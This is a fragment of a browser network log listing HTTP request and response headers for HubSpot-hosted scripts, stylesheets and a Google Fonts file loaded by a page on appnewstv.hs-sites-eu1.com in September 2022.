server: cloudflare
cf-ray: 74a86c018d401685-ARN
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /HubspotToolsMenu/static-1.138/js/index.js HTTP/1.1 
Host: static.hsappstatic.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.17.6.210
HTTP/2 200 OK
content-type: application/javascript
                                        
date: Wed, 14 Sep 2022 10:25:59 GMT
x-amz-replication-status: COMPLETED
last-modified: Wed, 27 Jul 2022 14:35:54 GMT
etag: W/"0d86ec7be24f2dff2308b8edf54c2f32"
x-amz-server-side-encryption: AES256
x-amz-version-id: k79.hN9WG526nViFF800Vr3DxQF_q.yo
vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Hit from cloudfront
via: 1.1 2f7792bdc67f7953e2dce93aea1bb9ee.cloudfront.net (CloudFront)
x-amz-cf-pop: ARN54-C1
x-amz-cf-id: YLTjijGIrvYs-mnf4m802qhKaeCMPTJPO9kWnGo7DPUFSWw4moWKag==
cf-cache-status: HIT
age: 1709116
expires: Thu, 14 Sep 2023 10:25:59 GMT
cache-control: public, max-age=31536000
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=g60gJohz0KQU7PGRcnfGp3qWAbFM8Dl6KPjTBEpFnS%2BRdwYYWO715D5rujZTku%2FBRFQhzOoh9GdyXff3jCbDcgKp88fw78i6IF3kK7b66Tu7ZAhIvvO4BEY1KP6ompjLBiMzDkocghY%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 74a86bf96c06b50c-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /cos-i18n/static-1.53/bundles/project.js HTTP/1.1 
Host: static.hsappstatic.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.17.6.210
HTTP/2 200 OK
content-type: application/javascript
                                        
date: Wed, 14 Sep 2022 10:25:59 GMT
x-amz-replication-status: COMPLETED
last-modified: Tue, 09 Nov 2021 16:12:42 GMT
etag: W/"61ca66de658cab9587e4636894680d5d"
x-amz-server-side-encryption: AES256
x-amz-version-id: P9ES7sOpFzrLl1QoRwjEAy5outPo5_GO
vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Hit from cloudfront
via: 1.1 251aba405178d16c89041692c3261a47.cloudfront.net (CloudFront)
x-amz-cf-pop: HEL50-C1
x-amz-cf-id: 34g4n2oNRs8WvBEZGObRDrs6gH3jdmXpAmCs72tfRrSAm6YeuGEZUA==
cf-cache-status: HIT
age: 54607
expires: Thu, 14 Sep 2023 10:25:59 GMT
cache-control: public, max-age=31536000
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fafhqoCTlJbt%2BiKRKdL5qVQux%2BOAoBmY%2FlwI%2FEptU1foOpVPNLpKkTuWS0kf%2BEKkpEPsxjNUpIxQkBg0yEWqEbLtkqvajjoKK3iP%2FI1UhJBn1IqKzblhdjtYs2QlefIjuuzx5VzDG7E%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 74a86bf96c09b50c-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /hub/-1/hub_generated/module_assets/-2712622/1663012019885/module_-2712622_Site_Search_Input.min.css HTTP/1.1 
Host: cdn2.hubspot.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.17.242.204
HTTP/2 200 OK
content-type: text/css
x-hs-alternate-content-type: text/plain
                                        
date: Wed, 14 Sep 2022 10:25:59 GMT
cf-ray: 74a86bf95bf11c16-OSL
access-control-allow-origin: *
age: 138382
cache-control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
etag: W/"c708989561e0cdbfcf996d1b7f47482c"
last-modified: Mon, 12 Sep 2022 19:47:00 GMT
vary: Accept-Encoding
cf-cache-status: HIT
access-control-allow-methods: GET
x-amz-cf-pop: IAD55-P1
x-amz-meta-created-unix-time-millis: 1663012019885
x-amz-replication-status: COMPLETED
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
x-hs-cf-lambda: us-east-1.enforceAclForReadsProd 15
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReadsProd 15
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Bw6Ue2LLAd9SnEh0aM2Ta2v7wsCVfUJSmWh%2BkKwTyD9uTicopZKl58oyFwR8vFmlG3IlGzk0OT6FjeYUae1GsU3pSUd1L5VjU5rN0uwH062xu3wscfn88IToIP9DlNKWXVA%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /css?family=Roboto:regular,700&display=swap HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.10
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Wed, 14 Sep 2022 10:25:59 GMT
date: Wed, 14 Sep 2022 10:25:59 GMT
cache-control: private, max-age=86400
cross-origin-opener-policy: same-origin-allow-popups
cross-origin-resource-policy: cross-origin
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /hub/-1/hub_generated/module_assets/-2712622/1663012019149/module_-2712622_Site_Search_Input.min.js HTTP/1.1 
Host: cdn2.hubspot.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.17.242.204
HTTP/2 200 OK
content-type: text/plain;charset=utf-8
x-hs-alternate-content-type: text/plain
                                        
date: Wed, 14 Sep 2022 10:25:59 GMT
cf-ray: 74a86bf95bf31c16-OSL
access-control-allow-origin: *
age: 138382
cache-control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
etag: W/"0953d5b1fcbcfc6d9e817b542caf4b9f"
last-modified: Mon, 12 Sep 2022 19:47:00 GMT
vary: Accept-Encoding
cf-cache-status: HIT
access-control-allow-methods: GET
x-amz-cf-pop: IAD55-P1
x-amz-meta-created-unix-time-millis: 1663012019149
x-amz-replication-status: COMPLETED
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
x-hs-cf-lambda: us-east-1.enforceAclForReadsProd 15
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReadsProd 15
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lyz5VrwUW22si3rYb%2Bc7wde7iVPOpJ7OKDKvvpIcpCvsVptClU4H5%2BeIbXH4%2BEaAK0dSfwrgoncM8tWBiWyjgDe3BtPdIdAHGDHVfTGQKrwdV1q0iCXL7qYKfp%2Fcuspsr8A%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---